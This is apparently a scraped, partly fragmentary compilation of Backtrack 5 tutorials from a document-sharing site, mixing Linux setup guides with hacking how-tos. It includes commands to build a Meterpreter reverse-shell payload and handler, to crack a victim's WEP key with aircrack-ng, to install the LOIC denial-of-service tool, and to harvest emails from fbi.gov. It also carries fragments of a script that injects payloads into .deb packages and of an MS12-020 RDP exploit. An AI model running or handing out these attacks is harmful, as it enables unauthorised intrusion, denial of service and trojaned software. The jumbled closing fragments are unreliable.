.-;--''--.._` ` (
.'
/ `
`' Q'
,
,.|
: .` ;
, `._
'
`-.;_'
` ` --,.._;
'`
, ) .'
`._ , ' /_
; ,''-,;' ````-..__``--`
=[ metasploit v4.3.0-dev [core:4.3 api:1.0]

+ -- --=[ 810 exploits - 452 auxiliary - 135 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
=[ svn r1 14857 updated today (2012.03.04)
msf > db_status

[*] postgresql connected to msf3dev
msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf >
Now you should be good to go !

Good luck!!!!!!!
25. Remove Old Kernel Versions form Backtrack 3.2.6 upgrade seen on reboot
tutorial si from: http://x73.cc/the-remove-the-old-kernel-images-the-from-backtrack-is.html
Ark@Dis9Team
Follow these steps and remove the old kernel images and clean up your GRUB boot menu.
First you need to find out what is the current kernel you are using. Open a terminal and run
the following command:
uname -r
It will print the version of the Linux kernel you are running.
then type:
dpkg get-selections|grep linux
It will print all of the version of the Linux kernel you was install.
then u can remove u not use Linux kernel just now.
apt-get remove linux-image-2.6.38*
or
u can search linux-image-2.6 without quotes from Synaptic Package Manager.
Mark delete Linux-image-(old version) and related package.
Click the apply button on the toolbar to complete the changes.
The results should show every currently installed as well as available kernel. Uncheck the
kernel images you want to uninstall. But be careful to keep the latest one we found with the
previous command.
just type this one:
Finally,just tpye:
update-grub
to update GRUB boot
26. INSTALL ATI and OPENCL in Backtrack 5 R1 or R2-tutorial
DOWNLOAD ATI DRIVERS FOR BACKTRACK:
1.Ati AMD Accelerated Parallel Processing (APP) SDK:,
http://developer.amd.com/sdks/AMDAPPSDK/downloads/Pages/default.aspx
2.ati driver installer for linux:

http://support.amd.com/us/gpudownload/linux/Pages/radeon_linux.aspx
Install OpenCL on Backtrack
In this guide we will be installing and configuring OpenCL on Backtrack.

NOTE: You might need to make some minor tweaks depending on your system.
Let's begin:
First of all before we start we want to make sure that our system is up to date.
root@bt:~# apt-get update && apt-get upgrade
Before we go on with installing the ATI drivers we need to get our kernel source prepared.
root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/
Now that we are set up it's time to download the ATI drivers.
download both drivers and move to desktop.
in terminal write:
cd /root/Desktop/
root@bt:~/Desktop# chmod +x amd-driver-installer-12-1-x86.x86_64.run

root@bt:~/Desktop# ./amd-driver-installer-12-1-x86.x86_64.run
root@bt:~/Desktop# reboot
Before we are finished there is one more thing that we need to install, The AMD Accelerated
Parallel Processing (APP) SDK, this one needs to be installed according to your CPU
architecture.
For 32 bit architecture:

cd /root/Desktop/
root@bt:~/Desktop# wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.6lnx32.tgz
root@bt:~/Desktop# tar -xvzf AMD-APP-SDK-v2.6-lnx32.tgz
root@bt:~/Desktop# ./Install-AMD-APP.sh
For 64 bit architecture:

cd /root/Desktop/
root@bt:~/Desktop# wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5lnx64.tgz
root@bt:~/Desktop# tar -xvzf AMD-APP-SDK-v2.6-lnx64.tgz
root@bt:~/Desktop# ./Install-AMD-APP.sh
We will also need cmake and cmake++ along with some other library files.
First we install the libraries and cmake:
root@bt:~# apt-get install libroot-python-dev libboost-python-dev zlib1g-dev libssl-dev

cmake libboost1.40-all-dev
Before we can install cmake++ we need to set the ATI Stream paths:
root@bt:~# echo "ATISTREAMSDKROOT=/opt/AMDAPP

root@bt:~# export ATISTREAMSDKROOT" >> ~/.bashrc
root@bt:~# source ~/.bashrc
Now we can proceed with the installation:
root@bt:~# svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp

root@bt:~# cd calpp/trunk
root@bt:~# cmake .
root@bt:~# make
root@bt:~# make install
In addition now we can install Pyrit with the OpenCL option.
root@bt:~# svn checkout http://pyrit.googlecode.com/svn/trunk/ /tmp/pyrit

root@bt:~# cd /tmp/pyrit/pyrit && python setup.py build && python setup.py install
root@bt:~# cd /tmp/pyrit/cpyrit_opencl && python setup.py build && python setup.py install
Now we can test Pyrit.
root@bt:~# pyrit list_cores

root@bt:~# pyrit benchmark
27. INSTALL LOIC IN BACKTRACK AND RUN

http://en.wikipedia.org/wiki/LOIC
Low Orbit Ion Cannon (LOIC) is an open source network stress testing and denial-ofservice attack application, written in C#. LOIC was initially developed by Praetox
Technologies, but was later released into the public domain,[1] and now is hosted on several
open source platforms.[2][3] It's named after a fictitious weapon from the Command &
Conquer series of video games.[4]
write in terminal:
root@bt:~# root@bt:~# aptitude install git-core monodevelop
root@bt:~# mkdir ~loic
root@bt:~# cd ~loic
root@bt:~/~loic# wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh
root@bt:~/~loic# chmod a+x loic.sh
root@bt:~/~loic# ./loic.sh install
root@bt:~/~loic# ./loic.sh update
root@bt:~/~loic# ./loic.sh run
If not work ./loic.sh run,use LOIC.exe run (it is installed in /root/~loic/LOIC/bin/Debug/ )

LOIC.exe run (open with mono-right click and choose mono)
create luncher for loic(right click on desktop and use create luncher)
in type must be application
command is:
/root/~loic/LOIC/bin/Debug/LOIC.exe run
or this command
/root/~loic/loic.sh run
add picture
add to panel or desktop

enjoy :)))
28. Uninstall Backtrack 5,R1 OR R2 Dual Boot Win 7(windows 7 ultimate but works on other
windows 7)
Uninstall Backtrack 5 Dual Boot Win 7(windows 7 ultimate but works on other windows
7) for beginners:
1. Remove old backtrack installation

2. Reinstall backtrack with new disk space allocation
to remove backtrack installation, which is dual booted with windows 7, i have to make sure
my windows 7 can still work well. after googling, i got the message to do fixmbr to recover
windows 7 boot manager. so here are the steps.
A. Fixing windows 7 boot manager

1. prepare your win7 installation disk (dvd/usb), plug it in.
2. start your computer, set the boot priority from bios setting (first boot usb, or cd/dvd room)
3. when windows 7 installation comes up, choose repair
4. choose repair this computer with recovery tool, click next
5. choose command prompt
6. enter this command:
BootRec.exe /fixmbr
7. reboot your computer
B. Remove backtrack
1. now your computer should start the win 7 automatically
2. go to control panel > System and Security > Administrative Tools > Computer Management
> choose Disk Management (under storage properties)
3. u will see clearly your computer partitions, delete your backtrack partition by right click >
delete Volume
4. after it is deleted you will have new disk space and u can expand your other windows
partition.
How expand your partition drive: C or D

1. go to control panel > System and Security > Administrative Tools > Computer
Management > choose Disk Management (under storage properties)
2. You will se free space-now right click and delete partition now this partition will be
unllocated
3. Right click on partition wich you will be expand and click on the extended volumenext-next and finish(you can type how much mb use for expand your partition)
29.INSTALL GOOGLE CHROME AND RUN AS ROOT
Download google chrome deb package and install with gdebi installer
if you not have gdebi installer install it with these command
root@bt: apt-get install gdebi
google-chrome open with gedit or kate

root@bt:~#gedit /usr/bin/google-chrome
in last line:
exec -a "$0" "$HERE/chrome" "$@"
type --user-data-dir
the line must be like this:
exec -a "$0" "$HERE/chrome" "$@" --user-data-dir
and save
30. How make postgresql database in msfconsole and fix armitage to work -TUTORIAL
Armitage and Metasploit require a Postgresql database to work.
BEFORE MAKING NEW POSTGRESQL DATABASE INSTALL POSTGRESQL IN

BACKTRACK
WITH THIS COMMAND:
apt-get install postgresql libpq-dev
apt-get install libpgsql-ruby
root@bt:~# /etc/init.d/postgres
bash: /etc/init.d/postgres: No such file or directory
root@bt:~# /etc/init.d/postgresql-8.4
Usage: /etc/init.d/postgresql-8.4 {start|stop|restart|reload|force-reload|status|autovac-start|
autovac-stop|autovac-restart}
root@bt:~# /etc/init.d/postgresql-8.4 start
* Starting PostgreSQL 8.4 database server
[ Ok ]
root@bt:~#su postgres -c psql

could not change directory to "/root"
psql (8.4.8)
Type "help" for help.
postgres=# help
You are using psql, the command-line interface to PostgreSQL.
Type: \copyright for distribution terms
\h for help with SQL commands
\? for help with psql commands
\g or terminate with semicolon to execute query

\q to quit
postgres=# \password
Enter new password: (NOTICE:TYPE YOUR OWN PASSWORD,EXEMPLE :HACKER)
Enter it again: AGAIN TYPE PASSWORD
postgres=#
_______________________________________________________________________
MAKE POSTGRESQL DATABASE IN MSFCONSOLE
run msfconsole
msf > db_connect
[*]
[*]
Usage: db_connect <pass>@<port>/<database></database></port></pass>

OR: db_connect -y [path/to/database.yml]
[*] Examples:
[*]
db_connect user@metasploit3
[*]
db_connect user:pass@192.168.0.2/metasploit3
[*]
db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect postgres:your password@127.0.0.1:5432/name of database

and you got this :
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column
"hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for
table "hosts"
NOTICE: CREATE TABLE will create implicit sequence "clients_id_seq" for serial column
"clients.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for
table "clients"
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial column
"services.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for
table "services"
NOTICE: CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column
"vulns.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for
table "vulns"
NOTICE: CREATE TABLE will create implicit sequence "refs_id_seq" for serial column
"refs.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for
table "refs"
NOTICE: CREATE TABLE will create implicit sequence "notes_id_seq" for serial column
"notes.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "notes_pkey" for
table "notes"
NOTICE: CREATE TABLE will create implicit sequence "wmap_targets_id_seq" for serial
column "wmap_targets.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index
"wmap_targets_pkey" for table "wmap_targets"
NOTICE: CREATE TABLE will create implicit sequence "wmap_requests_id_seq" for serial
column "wmap_requests.id"
"wmap_requests_pkey" for table "wmap_requests"
NOTICE: CREATE TABLE will create implicit sequence "workspaces_id_seq" for serial
column "workspaces.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "workspaces_pkey"
for table "workspaces"
NOTICE: CREATE TABLE will create implicit sequence "events_id_seq" for serial column
"events.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "events_pkey" for
table "events"
NOTICE: CREATE TABLE will create implicit sequence "loots_id_seq" for serial column
"loots.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "loots_pkey" for
table "loots"
NOTICE: CREATE TABLE will create implicit sequence "users_id_seq" for serial column
"users.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "users_pkey" for
table "users"
NOTICE: CREATE TABLE will create implicit sequence "reports_id_seq" for serial column
"reports.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "reports_pkey" for
table "reports"
NOTICE: CREATE TABLE will create implicit sequence "tasks_id_seq" for serial column
"tasks.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "tasks_pkey" for
table "tasks"
NOTICE: CREATE TABLE will create implicit sequence "creds_id_seq" for serial column
"creds.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "creds_pkey" for
table "creds"
NOTICE: CREATE TABLE will create implicit sequence "exploited_hosts_id_seq" for serial
column "exploited_hosts.id"
"exploited_hosts_pkey" for table "exploited_hosts"
NOTICE: CREATE TABLE will create implicit sequence "report_templates_id_seq" for
serial column "report_templates.id"
"report_templates_pkey" for table "report_templates"
NOTICE: CREATE TABLE will create implicit sequence "campaigns_id_seq" for serial
column "campaigns.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "campaigns_pkey"
for table "campaigns"
NOTICE: CREATE TABLE will create implicit sequence "email_templates_id_seq" for
serial column "email_templates.id"
"email_templates_pkey" for table "email_templates"
NOTICE: CREATE TABLE will create implicit sequence "attachments_id_seq" for serial
column "attachments.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "attachments_pkey"
for table "attachments"
NOTICE: CREATE TABLE will create implicit sequence "email_addresses_id_seq" for
serial column "email_addresses.id"
"email_addresses_pkey" for table "email_addresses"
NOTICE: CREATE TABLE will create implicit sequence "web_templates_id_seq" for serial
column "web_templates.id"
"web_templates_pkey" for table "web_templates"
NOTICE: CREATE TABLE will create implicit sequence "web_sites_id_seq" for serial
column "web_sites.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "web_sites_pkey"
for table "web_sites"
NOTICE: CREATE TABLE will create implicit sequence "web_pages_id_seq" for serial
column "web_pages.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "web_pages_pkey"
for table "web_pages"
NOTICE: CREATE TABLE will create implicit sequence "web_forms_id_seq" for serial
column "web_forms.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "web_forms_pkey"
for table "web_forms"
NOTICE: CREATE TABLE will create implicit sequence "web_vulns_id_seq" for serial
column "web_vulns.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "web_vulns_pkey"
for table "web_vulns"
NOTICE: CREATE TABLE will create implicit sequence "imported_creds_id_seq" for serial
column "imported_creds.id"
"imported_creds_pkey" for table "imported_creds"
NOTICE: CREATE TABLE will create implicit sequence "tags_id_seq" for serial column
"tags.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "tags_pkey" for
table "tags"
NOTICE: CREATE TABLE will create implicit sequence "sessions_id_seq" for serial
column "sessions.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "sessions_pkey" for
table "sessions"
NOTICE: CREATE TABLE will create implicit sequence "session_events_id_seq" for serial
column "session_events.id"
"session_events_pkey" for table "session_events"
NOTICE: CREATE TABLE will create implicit sequence "routes_id_seq" for serial column
"routes.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "routes_pkey" for
table "routes"
NOTICE: CREATE TABLE will create implicit sequence "api_keys_id_seq" for serial
column "api_keys.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "api_keys_pkey"
for table "api_keys"
NOTICE: CREATE TABLE will create implicit sequence "macros_id_seq" for serial column
"macros.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "macros_pkey" for
table "macros"
NOTICE: CREATE TABLE will create implicit sequence "cred_files_id_seq" for serial
column "cred_files.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "cred_files_pkey"
for table "cred_files"
NOTICE: CREATE TABLE will create implicit sequence "listeners_id_seq" for serial
column "listeners.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "listeners_pkey" for
table "listeners"
NOTICE: CREATE TABLE will create implicit sequence "nexpose_consoles_id_seq" for
serial column "nexpose_consoles.id"
"nexpose_consoles_pkey" for table "nexpose_consoles"
NOTICE: CREATE TABLE will create implicit sequence "profiles_id_seq" for serial column
"profiles.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "profiles_pkey" for
table "profiles"
NOTICE: CREATE TABLE will create implicit sequence "mod_refs_id_seq" for serial
column "mod_refs.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "mod_refs_pkey"
for table "mod_refs"
msf >
now you used postgresql database in msfconsole
IMPORTANT:
also save in txt document your user and password for further connecting after update or
upgrade metasploit
_____________________________________________________________________
FIX ARMITAGE
Linux Users
Try to start the database with:
/etc/init.d/framework-postgres start
If you see:
bash: /etc/init.d/framework-postgres: No such file or directory
Then congratulations! The script to start the database was not installed. This is the result of a
change to the latest Metasploit installer. If you don't opt to start Metasploit as a service,
Metasploit won't start your database on bootup. To create a database startup script and fix this
issue:
fix armitage after creating postgresql database

root@bt:~#echo 'exec /opt/metasploit/postgresql/scripts/ctl.sh "$@"' >/etc/init.d/frameworkpostgres
You should be all set now. Your database is running and it will start when you reboot your
host too.
If you see:
bogus data in lock file "postmaster.pid"
Then you need to delete some files. Try:

rm /opt/metasploit/postgresql/postmaster.pid
rm /opt/metasploit/postgresql/.s.PGSQL.7337.lock
OR:
rm /opt/framework/postgresql/data/postmaster.pid
rm /opt/framework/postgresql/.s.PGSQL.7175
rm /opt/framework/postgresql/.s.PGSQL.7175.lock
/etc/init.d/framework-postgres start
__________________________________________________________________
the end:)))
31. Matrix letters in terminal
Open TERMINAL:
Apt-get install cmatrix
Open new TERMINAL:

cmatrix
32. Email collector [METASPLOIT] [Tutorial]
Open METASPLOIT console:
Msf > search collector
Msf > use auxiliary/gather/search_email_collector

Msf > set domain [target site] fbi.gov
Msf > exploit
Wait to collect emails
33. HOW INSTALL FLASHPLAYER ON BACKTRACK 5 R1
Download flashplayer from official website and move to desktop DOWNLOAD ONLY
DEB.TAR.GZ FILE
REMOVE FLASHPLAYER:
root@bt:~# apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common
mozilla-plugin-gnash swfdec-mozilla
root@bt:~# rm -f /usr/lib/firefox/plugins/*flash*
root@bt:~# rm -f /usr/lib/firefox-addons/plugins/*flash*
root@bt:~# rm -f /usr/lib/mozilla/plugins/*flash*
root@bt:~# rm -f ~/.mozilla/plugins/*flash*so
root@bt:~# rm -rfd /usr/lib/nspluginwrapper
EXTRACT:
root@bt:~# tar xvfz flashplayer11_i386deb.tar.gz (write your deb.tar.gz file)
THIS IS ONLY FOR 64 BIT IF IS NOT 64 BIT SKIP THESE:

root@bt:~# chown root:root libflashplayer.so
root@bt:~# chmod 644 libflashplayer.so
root@bt:~# cp -f libflashplayer.so /usr/lib/mozilla/plugins/
root@bt:~# rm -rf libflashplayer.so
root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox/plugins/
INSTALL AND ADD TO FIREFOX:

root@bt:~# cd Desktop
root@bt:~# tar xvfz install_flash_player_11_i386.tar.gz (write your deb.tar.gz file)
root@bt:~# mkdir ~/.mozilla/plugins
root@bt:~# mv -f libflashplayer.so ~/.mozilla/plugins/
MAKE A FOLDER PLUGINS IN /usr/lib/firefox-addons/
root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox-addons/plugins/
root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/xulrunner-addons/plugins/
FOLDER ON DESKTOP OPEN AND YOU WILL SEE LOTS OF FOLDERS AND IN
THESE FOLDERS YOU WILL SEE APPLICATIONS,ICONS,DOCUMENTS ALL OF
THESE MOVE TO YOUR SISTEM.EXAMPLE: IF SOMETHING IN
USR/LIB/APPLICATION MOVE TO SYSTEM USR/LIB/APPLICATION
34. Hacking with exploit/multi/handler on Back|track 5 r1
Open terminal:
msfpayload windows/meterpreter/reverse_tcp lhost=[YOUR IP] lport=4444 > MSF.EXE
Open new terminal:

msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=[YOUR IP]
lport=4444 E
35. Hacking WEP key with Aircrack-ng on Back|track [TUTORIAL]
Open terminal:
Airmon-ng
Airmon-ng stop [your interface] [My is wlan0]
Airodump-ng [your interface] [My is wlan0]
Airodump-ng --channel [Victim channel] --write wep --bssid [Victim BSSID] [your interface]
[My is wlan0]
**Attention not close this terminal **
Open new terminal:

Aireplay-ng -1 0 -a [Victim BSSID] [your interface] [My is wlan0]
**Attention wait for the recognize router :-) **
Open new terminal:

Aireplay-ng -3 -b [Victim BSSID] [your interface] [My is wlan0]
**Attention not close this terminal **
Open new terminal:
Aircrack-ng wep-01.cap
**Attention Wait to collect 5000 packets and start Aircrack-ng attack**

Backtrack 5 R1&amp;R2 Tutorials

Diunggah oleh

Informasi Dokumen

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

Backtrack 5 R1&amp;R2 Tutorials

Diunggah oleh

Hak Cipta:

Format Tersedia

1.

Video player on BackTrack 5 R1 - R2

2.Updating BackTrack 5 R1 [ ONLY FOR R1 ]

sudo apt-get install libzlib-ruby

3) Set up the password for postgres

sudo apt-get install ruby1.8-dev

4)download the Unix tarball from Framework Website

5) Extract it and go to the Framework directory and from there run

Enter the password ('your password') you have set before.

6) Now run the metasploit

at the last command you should not get any error

db_nmap IP ADDRESS TO TEST -p 445

DO NOT USE IT TO OTHER IP THAT YOU DO NOT HAVE AUTHORISATION. THIS IS

start the exploitation

to know the meaning of this type

5. Installing VirtualBox on Backtrack 5 R1 or R2

7.How to install LINUX/UNIX/BACKTRACK *.tar.gz tarball files-QUICK TUTORIAL

To uncompress them, execute the following command(s) depending on the extension:

Now change directory

2: Build and install software

3: Read INSTALL / README file

8.Install sslstrip for sniffing on Backtrack

copying sslstrip/DnsCache.py -> build/lib.linux-i686-2.6/sslstrip

Login password : your password

for registration go http://www.nessus.org/register/

10. Adding New Users in Backtrack 5

11. Managing User in Backtrack 5

# Network interface (check with ifconfig) e.g. eth0

# Settings *** Dont touch ***

ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')

trap 'cleanup' 2 # Interrupt - "Ctrl + C"

Usage: bash evilDEB.sh -i [interface] -d [file]

echo -e "\e[01;36m[*]\e[00m g0tmilk's evilDEB v$version"

while getopts "d:i:m:dh?" OPTIONS; do

) echo "\e[00;31m[-]\e[00m Unknown option.";; # DEFAULT

echo -e "\e[01;32m[>]\e[00m Checking environment..."

if [ "$debFile" == "" ]; then

echo -e "\e[01;32m[>]\e[00m Extracting .DEB..."

echo -e "\e[01;32m[>]\e[00m Creating payload..."

echo -e "\e[01;32m[>]\e[00m Injecting payload..."

echo -e "\e[01;32m[>]\e[00m Creating .DEB file..."

echo -e "\e[01;32m[>]\e[00m Running web server... (http://$ourIP:8000)"

echo -e "\e[01;32m[>]\e[00m Running metasploit..."

insert the DVD-live

in the grub press TAB to edit boot

you well see somthing like this file=/cdrom/preseed/ubuntu.seed boot=casper

add xforcevesa noapic noapci nosplash irqpoll -- after initrd.gz

I try and works!!!!

ruby script you will found on http://blog.binaryninjas.org/?p=58

# ms12-020 PoC attempt

def send_tpkt(sd, data)

def make_rdp(type, flags, data)

# craft connection request

rdp = make_rdp(1, 0, [ 0 ].pack('V'))

mcs = "\x7f\x65\x82" + [ mcs_data.length ].pack('n') # connect-initial (0x65 / 101), length

# send a special one?

# send more pkts! - based on poc

send_tpkt(sd, x224_2 + "\x2e\x00\x00\x01")

#send_tpkt(sd, x224_2 + "\x2e\x00\x00\x04")

# read connect-initial response

root@bt: ifconfig eth0 up

Common dpkg commands

[*] msfupdate[*] Attempting to update the Metasploit Framework...[*]

svn: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required

Backtrack 5 R1&R2 Tutorials

Backtrack 5 R1&R2 Tutorials

# Settings * Dont touch *

[] msfupdate[] Attempting to update the Metasploit Framework...[*]